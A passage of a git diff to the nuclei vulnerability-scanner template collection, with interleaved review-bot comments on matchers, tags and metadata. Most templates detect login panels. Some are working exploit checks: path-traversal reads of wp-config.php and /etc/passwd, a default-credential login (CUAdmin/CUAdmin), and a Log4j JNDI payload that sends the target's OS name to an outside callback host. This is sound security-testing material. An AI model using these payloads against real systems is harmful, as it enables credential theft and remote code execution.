'
+ - '404 Not Found
'
+ condition: and
diff --git a/nuclei-templates/Other/cas-login-870.yaml b/nuclei-templates/Other/cas-login-870.yaml
new file mode 100644
index 0000000000..b2f2d90bea
--- /dev/null
+++ b/nuclei-templates/Other/cas-login-870.yaml
@@ -0,0 +1,19 @@
+id: cas-login
+info:
+ name: CAS Login Panel
+ author: pdteam
+ severity: info
+ metadata:
+ shodan-query: http.title:'CAS - Central Authentication Service'
+ github: https://github.com/apereo/cas
+ tags: apereo,cas,panel,login
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cas/login"
+ redirects: true
+ max-redirects: 2
+ matchers:
+ - type: word
+ words:
+ - 'Central Authentication Service'
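Review bot: The word matcher at the end of this hunk has no `part:` and the template has no status check, so any response reached within two redirects whose headers or body happen to contain 'Central Authentication Service' — a 404 page, a help page that mentions CAS — is reported as a login panel. Scope the match to the body and require a 200 under `matchers-condition: and`; the deleted copy in the next hunk has the same gap, so this is an improvement opportunity rather than a regression. The `{{BaseURL}}/cas/login` path and the redirect settings can stay as they are.

```yaml
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Central Authentication Service'

      - type: status
        status:
          - 200
```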
diff --git a/nuclei-templates/Other/cas-login.yaml b/nuclei-templates/Other/cas-login.yaml
deleted file mode 100644
index 8a225d7e04..0000000000
--- a/nuclei-templates/Other/cas-login.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: cas-login
-
-info:
- name: CAS Login Panel
- author: pdteam
- severity: info
- tags: apereo,cas,panel,login
- metadata:
- shodan-query: http.title:'CAS - Central Authentication Service'
- github: https://github.com/apereo/cas
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cas/login"
-
- redirects: true
- max-redirects: 2
- matchers:
- - type: word
- words:
- - 'Central Authentication Service'
diff --git a/nuclei-templates/Other/centreon-detect-875.yaml b/nuclei-templates/Other/centreon-detect-875.yaml
new file mode 100644
index 0000000000..8c77644cef
--- /dev/null
+++ b/nuclei-templates/Other/centreon-detect-875.yaml
@@ -0,0 +1,24 @@
+id: centreon-detect
+
+info:
+ name: Centreon Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,centreon
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/centreon/index.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "
Centreon - IT & Network Monitoring"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/centreon-detect-877.yaml b/nuclei-templates/Other/centreon-detect-877.yaml
deleted file mode 100644
index c3ca5df6a4..0000000000
--- a/nuclei-templates/Other/centreon-detect-877.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: centreon-detect
-
-info:
- name: Centreon Detect
- author: pikpikcu
- severity: info
- tags: tech,centreon
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/centreon/index.php"
-
- matchers-condition: and
- matchers:
-
- - type: word
- part: body
- words:
- - "
Centreon - IT & Network Monitoring"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/certificate-validation-882.yaml b/nuclei-templates/Other/certificate-validation-882.yaml
new file mode 100644
index 0000000000..c8969eea4f
--- /dev/null
+++ b/nuclei-templates/Other/certificate-validation-882.yaml
@@ -0,0 +1,12 @@
+id: improper-certificate-validation
+info:
+ name: Improper Certificate Validation
+ author: gaurang
+ severity: medium
+file:
+ - extensions:
+ - all
+ matchers:
+ - type: word
+ words:
+ - "Landroid/webkit/SslErrorHandler;->proceed()V"
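Review bot: This copy drops the `tags: android,file` line that the deleted version (next hunk, at its `tags:` line) carried, so `nuclei -tags android` or `-tags file` will no longer select the template; restore `tags: android,file` under `info:`. The single smali match on `Landroid/webkit/SslErrorHandler;->proceed()V` fires on every call site, which may include a call that only runs after a user prompt, so a hit is a triage lead rather than a confirmed bypass — a one-line `description:` saying so would help whoever reads the report, e.g. `description: Flags any WebView SslErrorHandler.proceed() call; confirm the call is unconditional before reporting a certificate-validation bypass.`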
diff --git a/nuclei-templates/Other/certificate-validation.yaml b/nuclei-templates/Other/certificate-validation.yaml
deleted file mode 100644
index 64a9fecc52..0000000000
--- a/nuclei-templates/Other/certificate-validation.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: improper-certificate-validation
-
-info:
- name: Improper Certificate Validation
- author: gaurang
- severity: medium
- tags: android,file
-
-file:
- - extensions:
- - all
-
- matchers:
- - type: word
- words:
- - "Landroid/webkit/SslErrorHandler;->proceed()V"
\ No newline at end of file
diff --git a/nuclei-templates/Other/cgi-printenv-886.yaml b/nuclei-templates/Other/cgi-printenv-886.yaml
index 0deacd17e0..0410dfbd68 100644
--- a/nuclei-templates/Other/cgi-printenv-886.yaml
+++ b/nuclei-templates/Other/cgi-printenv-886.yaml
@@ -1,15 +1,19 @@
id: cgi-printenv
+
info:
- author: emadshanab
name: CGI script environment variable
+ author: emadshanab
severity: medium
description: A test CGI (Common Gateway Interface) script was found on this server. The response page returned by this CGI script is leaking a list of server environment variables.
- reference: https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/
+ reference:
+ - https://www.acunetix.com/vulnerabilities/web/test-cgi-script-leaking-environment-variables/
tags: exposure,generic,cgi
+
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/printenv.pl"
+
matchers-condition: and
matchers:
- type: word
@@ -20,6 +24,7 @@ requests:
- 'SERVER_ADMIN'
- 'Environment Variables:'
condition: or
+
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
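Review bot: The rewritten last line `+ - 200` is now followed by `\ No newline at end of file`, so this edit strips the file's terminating newline while otherwise only reflowing whitespace and turning `reference:` into a list; restore the trailing newline so the file stays yamllint-clean and the next touch does not produce a spurious one-line diff. No matcher behaviour in this hunk changes.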
diff --git a/nuclei-templates/Other/cgi-test-page-890.yaml b/nuclei-templates/Other/cgi-test-page.yaml
similarity index 100%
rename from nuclei-templates/Other/cgi-test-page-890.yaml
rename to nuclei-templates/Other/cgi-test-page.yaml
diff --git a/nuclei-templates/Other/chamilo-lms-sqli-891.yaml b/nuclei-templates/Other/chamilo-lms-sqli-892.yaml
similarity index 100%
rename from nuclei-templates/Other/chamilo-lms-sqli-891.yaml
rename to nuclei-templates/Other/chamilo-lms-sqli-892.yaml
diff --git a/nuclei-templates/Other/chamilo-lms-xss.yaml b/nuclei-templates/Other/chamilo-lms-xss.yaml
index 77ecc3124b..0818c85597 100644
--- a/nuclei-templates/Other/chamilo-lms-xss.yaml
+++ b/nuclei-templates/Other/chamilo-lms-xss.yaml
@@ -1,7 +1,7 @@
id: chamilo-lms-xss
info:
name: Chamilo LMS Cross Site Scripting
- author: geeknik
+ author: nithissh
severity: medium
description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
tags: xss,chamilo
diff --git a/nuclei-templates/Other/checkmarx-panel-895.yaml b/nuclei-templates/Other/checkmarx-panel-895.yaml
deleted file mode 100644
index 70b24b66eb..0000000000
--- a/nuclei-templates/Other/checkmarx-panel-895.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: checkmarx-panel-detect
-
-info:
- name: Checkmarx WebClient detector
- author: joanbono
- severity: info
- tags: panel,checkmarx
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cxwebclient/Login.aspx"
-
- matchers:
- - type: word
- words:
- - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
- part: body
diff --git a/nuclei-templates/Other/checkmarx-panel-897.yaml b/nuclei-templates/Other/checkmarx-panel-897.yaml
new file mode 100644
index 0000000000..4aa65b0e49
--- /dev/null
+++ b/nuclei-templates/Other/checkmarx-panel-897.yaml
@@ -0,0 +1,19 @@
+id: checkmarx-panel-detect
+
+info:
+ name: Checkmarx WebClient detector
+ author: joanbono
+ severity: info
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cxwebclient/Login.aspx"
+ headers:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+ matchers:
+ - type: word
+ words:
+ - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
+ part: body
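Review bot: The `tags:` line loses `checkmarx` relative to the deleted copy in the previous hunk (`tags: panel,checkmarx` there), so tag-based selection of this template by product no longer works; keep `tags: panel,checkmarx`. The added `User-Agent` header only changes the request, not what counts as a hit, so it is harmless; the single `word` matcher still has no status check, the same gap as the cas-login template earlier in this diff, so consider a `type: status` matcher for 200 under `matchers-condition: and`.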
diff --git a/nuclei-templates/Other/checkpoint-panel-899.yaml b/nuclei-templates/Other/checkpoint-panel-898.yaml
similarity index 100%
rename from nuclei-templates/Other/checkpoint-panel-899.yaml
rename to nuclei-templates/Other/checkpoint-panel-898.yaml
diff --git a/nuclei-templates/Other/cherry-lfi-903.yaml b/nuclei-templates/Other/cherry-lfi-903.yaml
new file mode 100644
index 0000000000..b0b6c0a44f
--- /dev/null
+++ b/nuclei-templates/Other/cherry-lfi-903.yaml
@@ -0,0 +1,36 @@
+id: cherry-lfi
+
+info:
+ name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
+ author: dhiyaneshDK
+ severity: high
+ description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the
+ wp-config.php file.
+ reference:
+ - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
+ - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-22
+ tags: wordpress,wp-plugin,lfi,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/04/21
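Review bot: The template exercises only the read side — a single GET to `download-content.php?file=../../../../../wp-config.php` — while `name:` and `description:` also advertise arbitrary file upload, which nothing here verifies; either trim the wording to the traversal/download check that is actually performed or state that upload is not tested. Because the matcher requires `DB_NAME` and `DB_PASSWORD` in a 200 body, a hit means the full `wp-config.php` with live database credentials has been pulled into the scanner, so stored responses from this template are sensitive; say so for the reader, e.g. `remediation: Update the Cherry plugin to 1.2.7 or later; if this check returned wp-config.php, treat the database credentials as exposed and rotate them.` The rest of the file is a metadata reflow of the deleted copy in the next hunk.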
diff --git a/nuclei-templates/Other/cherry-lfi.yaml b/nuclei-templates/Other/cherry-lfi.yaml
deleted file mode 100644
index 7df075f0c8..0000000000
--- a/nuclei-templates/Other/cherry-lfi.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cherry-lfi
-info:
- name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
- author: dhiyaneshDK
- severity: high
- description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
- reference:
- - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE
- tags: wordpress,wp-plugin,lfi,wp
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "DB_NAME"
- - "DB_PASSWORD"
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/chinaunicom-default-login-906.yaml b/nuclei-templates/Other/chinaunicom-default-login-906.yaml
deleted file mode 100644
index ad88f640d7..0000000000
--- a/nuclei-templates/Other/chinaunicom-default-login-906.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: chinaunicom-default-login
-info:
- name: China Unicom Modem Default Login
- author: princechaddha
- severity: high
- description: Default login credentials were discovered for a China Unicom modem.
- classification:
- cwe-id: CWE-798
- tags: chinaunicom,default-login
-requests:
- - raw:
- - |
- POST /cu.html HTTP/1.1
- Host: {{Hostname}}
-
- frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
- attack: pitchfork
- payloads:
- username:
- - CUAdmin
- password:
- - CUAdmin
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 302
- - type: word
- words:
- - "/menu.gch"
- part: header
-
-# Enhanced by mp on 2022/03/03
diff --git a/nuclei-templates/Other/chinaunicom-default-login.yaml b/nuclei-templates/Other/chinaunicom-default-login.yaml
new file mode 100644
index 0000000000..0121060abf
--- /dev/null
+++ b/nuclei-templates/Other/chinaunicom-default-login.yaml
@@ -0,0 +1,28 @@
+id: chinaunicom-default-login
+info:
+ name: Chinaunicom Modem Default Login
+ author: princechaddha
+ severity: high
+ tags: chinaunicom,default-login
+requests:
+ - raw:
+ - |
+ POST /cu.html HTTP/1.1
+ Host: {{Hostname}}
+
+ frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=
+ attack: pitchfork
+ payloads:
+ username:
+ - CUAdmin
+ password:
+ - CUAdmin
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 302
+ - type: word
+ words:
+ - "/menu.gch"
+ part: header
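Review bot: The raw POST to `/cu.html` sends a form-encoded body without a `Content-Type: application/x-www-form-urlencoded` header, and nuclei sends raw requests as written, so whether the modem parses `Username`/`Password` at all depends on the firmware tolerating a missing content type — add that header line under `Host:`. This copy also drops the `description:` and the `classification: cwe-id: CWE-798` block that the deleted version in the previous hunk carried, which is a metadata regression; restore both. The body repeats `Username=` and `Password=` with empty values after the templated pair, which presumably mirrors the device's real form, but it deserves a comment since a last-value-wins parser would see empty credentials.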
diff --git a/nuclei-templates/Other/church-admin-lfi-912.yaml b/nuclei-templates/Other/church-admin-lfi-912.yaml
deleted file mode 100644
index 9885353c52..0000000000
--- a/nuclei-templates/Other/church-admin-lfi-912.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: church-admin-lfi
-
-info:
- name: Church Admin 0.33.2.1 - Unauthenticated Directory Traversal
- author: 0x_Akoko
- severity: high
- description: The "key" parameter of download.php from plugins/church-admin/display/download.php is not sanitized and is vulnerable to a directory traversal type of attack.
- reference:
- - https://wpscan.com/vulnerability/8997
- - https://id.wordpress.org/plugins/church-admin/
- tags: wordpress,wp-plugin,lfi
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/church-admin-lfi.yaml b/nuclei-templates/Other/church-admin-lfi.yaml
new file mode 100644
index 0000000000..130de762a2
--- /dev/null
+++ b/nuclei-templates/Other/church-admin-lfi.yaml
@@ -0,0 +1,28 @@
+id: church-admin-lfi
+info:
+ name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
+ reference:
+ - https://wpscan.com/vulnerability/8997
+ - https://id.wordpress.org/plugins/church-admin/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: wordpress,wp-plugin,lfi
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/nuclei-templates/Other/circarlife-setup-920.yaml b/nuclei-templates/Other/circarlife-setup-920.yaml
new file mode 100644
index 0000000000..808a1e8646
--- /dev/null
+++ b/nuclei-templates/Other/circarlife-setup-920.yaml
@@ -0,0 +1,28 @@
+id: circarlife-setup
+info:
+ name: Exposed CirCarLife Setup Page
+ author: geeknik
+ description: CirCarLife is an internet-connected electric vehicle charging station
+ reference: https://circontrol.com/
+ severity: critical
+ tags: scada,circontrorl,circarlife,setup,exposure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/html/setup.html"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "CirCarLife Scada"
+ - type: word
+ words:
+ - "
- setup"
+ - "Network setup"
+ - "Modem setup"
+ - "Security setup"
+ condition: and
+ - type: status
+ status:
+ - 200
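Review bot: The tag `circontrorl` is a typo for the vendor name `circontrol` (the `reference:` points at circontrol.com), so `-tags circontrol` never selects this template; it was already wrong in the deleted copy, and this copy additionally drops the `panel` tag — use `tags: scada,circontrol,circarlife,setup,exposure,panel`. The header match on `CirCarLife Scada`, the four `*setup` body words under `condition: and`, and the 200 check form a reasonably tight fingerprint for a critical finding, so the matchers themselves look fine.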
diff --git a/nuclei-templates/Other/circarlife-setup.yaml b/nuclei-templates/Other/circarlife-setup.yaml
deleted file mode 100644
index 13d2489404..0000000000
--- a/nuclei-templates/Other/circarlife-setup.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: circarlife-setup
-info:
- name: Exposed CirCarLife Setup Page
- author: geeknik
- description: CirCarLife is an internet-connected electric vehicle charging station
- reference: https://circontrol.com/
- severity: critical
- tags: scada,circontrorl,circarlife,setup,exposure,panel
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/html/setup.html"
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "CirCarLife Scada"
- - type: word
- words:
- - "
- setup"
- - "Network setup"
- - "Modem setup"
- - "Security setup"
- condition: and
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/circleci-config-924.yaml b/nuclei-templates/Other/circleci-config-924.yaml
new file mode 100644
index 0000000000..6483134342
--- /dev/null
+++ b/nuclei-templates/Other/circleci-config-924.yaml
@@ -0,0 +1,26 @@
+id: circleci-config
+
+info:
+ name: circleci config.yml exposure
+ author: geeknik
+ severity: low
+ reference:
+ - https://circleci.com/docs/2.0/sample-config/
+ tags: config,exposure,circleci
+
+requests:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/.circleci/config.yml"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'regex("^version: ", body) && contains(body, "jobs:")'
+
+ - type: status
+ status:
+ - 200
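Review bot: `regex("^version: ", body)` anchors only at the very start of the body, so a `.circleci/config.yml` that opens with a comment, a `---` document marker, or a BOM is missed even though `jobs:` is present; use `regex("(?m)^version: ", body)` so the anchor applies per line. The added `circleci` tag and the `reference:` list are fine, but the circleci-ssh-config hunk further down removes that same tag, so the two CircleCI templates should be made consistent.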
diff --git a/nuclei-templates/Other/circleci-config.yaml b/nuclei-templates/Other/circleci-config.yaml
deleted file mode 100644
index 98cf8b37cf..0000000000
--- a/nuclei-templates/Other/circleci-config.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: circleci-config
-
-info:
- name: circleci config.yml exposure
- author: geeknik
- severity: low
- reference: https://circleci.com/docs/2.0/sample-config/
- tags: config,exposure
-
-requests:
- - method: GET
- redirects: true
- max-redirects: 3
- path:
- - "{{BaseURL}}/.circleci/config.yml"
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - 'regex("^version: ", body) && contains(body, "jobs:")'
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/circleci-ssh-config.yaml b/nuclei-templates/Other/circleci-ssh-config.yaml
index 0d19b816b8..3c3d245991 100644
--- a/nuclei-templates/Other/circleci-ssh-config.yaml
+++ b/nuclei-templates/Other/circleci-ssh-config.yaml
@@ -4,7 +4,7 @@ info:
name: circleci ssh-config exposure
author: geeknik
severity: low
- tags: config,exposure,circleci
+ tags: config,exposure
requests:
- method: GET
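Review bot: This hunk removes `circleci` from `tags:` while the circleci-config template earlier in the same diff gains it, so product-tag selection becomes inconsistent across the two CircleCI exposure checks; keep `tags: config,exposure,circleci`. Nothing else in the template changes here.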
diff --git a/nuclei-templates/Other/circleci.yaml b/nuclei-templates/Other/circleci.yaml
deleted file mode 100644
index b01e427381..0000000000
--- a/nuclei-templates/Other/circleci.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: api-circleci
-
-info:
- name: CircleCI API Test
- author: zzeitlin
- reference: https://circleci.com/docs/api/v1
- severity: info
- tags: token-spray,circleci
-
-self-contained: true
-requests:
- - method: GET
- path:
- - "https://circleci.com/api/v1.1/me?circle-token={{token}}"
-
- matchers:
- - type: word
- part: body
- words:
- - '"admin"'
- - '"login"'
- condition: and
diff --git a/nuclei-templates/Other/cisco-ace-device-manager-929.yaml b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml
new file mode 100644
index 0000000000..70e4205e76
--- /dev/null
+++ b/nuclei-templates/Other/cisco-ace-device-manager-929.yaml
@@ -0,0 +1,25 @@
+id: cisco-ace-device-manager
+
+info:
+ name: ACE 4710 Device Manager
+ author: dhiyaneshDk
+ severity: info
+ metadata:
+ shodan-query: html:"ACE 4710 Device Manager"
+ tags: panel,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.vm"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "
ACE 4710 DM - Login"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/Other/cisco-ace-device-manager.yaml b/nuclei-templates/Other/cisco-ace-device-manager.yaml
deleted file mode 100644
index 09704c579f..0000000000
--- a/nuclei-templates/Other/cisco-ace-device-manager.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: cisco-ace-device-manager
-
-info:
- name: ACE 4710 Device Manager
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'html:"ACE 4710 Device Manager"'
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.vm"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
ACE 4710 DM - Login"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/Other/cisco-asa-panel.yaml b/nuclei-templates/Other/cisco-asa-panel-932.yaml
similarity index 100%
rename from nuclei-templates/Other/cisco-asa-panel.yaml
rename to nuclei-templates/Other/cisco-asa-panel-932.yaml
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
new file mode 100644
index 0000000000..af3f889993
--- /dev/null
+++ b/nuclei-templates/Other/cisco-cloudcenter-suite-log4j-rce.yaml
@@ -0,0 +1,63 @@
+id: cisco-cloudcenter-suite-log4j-rce
+
+info:
+ name: Cisco CloudCenter Suite (Log4j)- Remote Code Execution
+ author: pwnhxl
+ severity: critical
+ description: |
+ Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
+ reference:
+ - https://logging.apache.org/log4j/2.x/security.html
+ - http://www.openwall.com/lists/oss-security/2021/12/10/1
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ fofa-query: title="CloudCenter Suite"
+ shodan-query: title:"CloudCenter Suite"
+ tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
+
+requests:
+ - raw:
+ - |
+ @timeout: 10s
+ POST /suite-auth/login HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */${jndi:ldap://${sys:os.name}.{{interactsh-url}}}
+ Content-Type: application/json
+
+ {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable
+
+ - type: word
+ part: header
+ words:
+ - 'X-RateLimit-Limit-suite-gateway_suite-auth'
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ part: interactsh_request
+ group: 1
+ regex:
+ - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output
+
+# Enhanced by md on 2023/03/22
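Review bot: The `interactsh_request` matcher regex `'([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'` leaves the separator dots unescaped, so it matches almost any dotted token and adds nothing beyond the `dns` protocol check above it; escape them as the extractor below already does, `'([a-zA-Z0-9.-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'`. The payload also switches from `${hostName}` with two random prefixes (deleted copy, next hunk) to `${sys:os.name}`, whose value may contain spaces on some JVMs and then does not form a valid DNS label, which would turn a vulnerable host into a miss. Finally, the deleted copy used the `http:` key and ended with a `# digest:` line, so this replacement presumably reinstates an older unsigned revision under the deprecated `requests:` key — worth confirming that is intended.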
diff --git a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml b/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
deleted file mode 100644
index 37a4dabf81..0000000000
--- a/nuclei-templates/Other/cisco-cloudcenter-suite-rce.yaml
+++ /dev/null
@@ -1,73 +0,0 @@
-id: cisco-cloudcenter-suite-log4j-rce
-
-info:
- name: Cisco CloudCenter Suite (Log4j) - Remote Code Execution
- author: pwnhxl
- severity: critical
- description: |
- Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
- remediation: From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
- reference:
- - https://logging.apache.org/log4j/2.x/security.html
- - http://www.openwall.com/lists/oss-security/2021/12/10/1
- - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10
- cve-id: CVE-2021-44228
- cwe-id: CWE-77
- metadata:
- max-request: 1
- shodan-query: title:"CloudCenter Suite"
- fofa-query: title="CloudCenter Suite"
- tags: cve,cve2021,jndi,log4j,rce,oast,cloudcenter,cisco,kev
-variables:
- rand1: '{{rand_int(111, 999)}}'
- rand2: '{{rand_int(111, 999)}}'
-
-http:
- - raw:
- - |
- @timeout: 10s
- POST /suite-auth/login HTTP/1.1
- Host: {{Hostname}}
- Accept: application/json, text/plain, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}
- Content-Type: application/json
-
- {"username":"{{randstr}}@{{randstr}}.com","password":"{{randstr}}","tenantName":"{{randstr}}"}
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'X-RateLimit-Limit-suite-gateway_suite-auth'
-
- - type: word
- part: interactsh_protocol # Confirms the DNS Interaction
- words:
- - "dns"
-
- - type: regex
- part: interactsh_request
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- extractors:
- - type: kval
- kval:
- - interactsh_ip
-
- - type: regex
- part: interactsh_request
- group: 2
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
- - type: regex
- part: interactsh_request
- group: 1
- regex:
- - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
-
-# digest: 4a0a00473045022100c2f5e8163a564e7d2fd0530a85cb7e37e568e017f19c9ed7fa4652e03a0de4c602203859ca9dc699f5dec2304a7611352a5d8889ae7e4a3400870ba2608640d522fa:922c64590222798bb761d5b6d8e72950
